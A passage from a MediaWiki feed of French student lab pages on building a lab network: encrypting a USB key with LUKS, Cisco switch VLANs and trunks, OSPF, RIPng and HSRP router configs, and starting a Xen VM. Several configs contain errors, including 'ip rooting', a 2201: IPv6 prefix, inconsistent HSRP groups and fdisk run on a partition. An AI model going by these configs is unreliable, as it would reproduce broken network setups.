      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51404</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51404"/>
				<updated>2019-11-29T11:43:42Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Paquetages nécessaires pour RAID5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
